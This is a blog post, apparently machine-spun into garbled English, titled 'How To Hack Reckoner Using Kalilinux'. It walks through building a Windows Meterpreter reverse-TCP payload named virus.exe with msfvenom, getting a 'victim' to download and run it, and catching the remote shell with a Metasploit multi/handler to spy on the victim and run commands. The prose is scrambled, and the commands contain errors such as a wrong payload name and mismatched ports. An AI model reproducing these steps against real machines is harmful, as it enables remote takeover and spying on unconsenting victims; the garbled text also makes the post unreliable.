-->
How To Hack Reckoner Using Kalilinux?

How To Hack Reckoner Using Kalilinux?

How To Hack Reckoner Using Kalilinux?

Hello , Friends you lot are wellcome hither .  My today's is " How to Hack Computer Using kali Linux ?"  Friends, First of all I desire to tells almost that Kali Linux . 
Kali Linux is 1 of the best passion operating organisation of white lid hackers, safety researchers as well as pentester. It gives advanced penetration testing tool as well as its repose of utilization implies that it should live on a role of every safety professional’s toolbox.






What is KaliLinux According to Wikipedia:

Kali Linux is a Debian-derived Linux distribution designed for digital forensics as well as penetration testing. Kali Linux is distributed inwards 32-bit as well as 64-bit images for utilization on hosts based on the x86 didactics ready as well as equally an icon for the ARM architecture for utilization on the BeagleBoard figurer as well as on Samsung's ARM.

Requirements:

  • Kali Linux OS (Metasploit framework Preloded)
  • Computer (Windows Installed)
So , Lets become started

Part 1 :  Create the Virus

Dear friends starting fourth dimension of all , you lot practice the payload(Virus) using msfvenom. Following ascendance you lot volition practice the virus inwards .exe format.
Command:  msfvenom -p window/meterpreter/reverse_tcp lhost=192.168.1.103 lport=4444 -f exe .a  x86 > virus.exe  
A virus volition created inwards the Desktop folder.
Short stories the victim download the malicious EXE  file as well as install it. After Victim opened upwards the application. 

Part2: How to Attack Victim Computer

Step1: First Of all Start the Metasploit Framework Console equally follows :
Command: msfconsole
Wait for a few minute. Metasploit framework started.

Step2: Now later doing this side past times side step. nosotros take away practice Set payload as well as Port. Write the next ascendance as well as later writing each ascendance striking enter.
Command: 
msf> utilization multi/handler  Press Enter
msf exploit(handler) > ready payload windows/meterpreter/reverse_tcp  Press Enter
msf exploit(handler) > ready LHOST “Attacker ip”  Press Enter
msf exploit(handler) > ready LPORT 444  Press Enter
msf exploit(handler) > exploit Press Enter

Write the Attacker IP address inwards The LHOST Part , Payload Handler is  Started. Meterpreter session allows you lot to execute organisation commands, networking commands, spy the covert as well as much more.  You run across the whole listing of commands type help .

         If  you similar this postal service delight don't  forget to portion it amongst friends also delight socialize it . give thank you lot you as well as then much .

Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser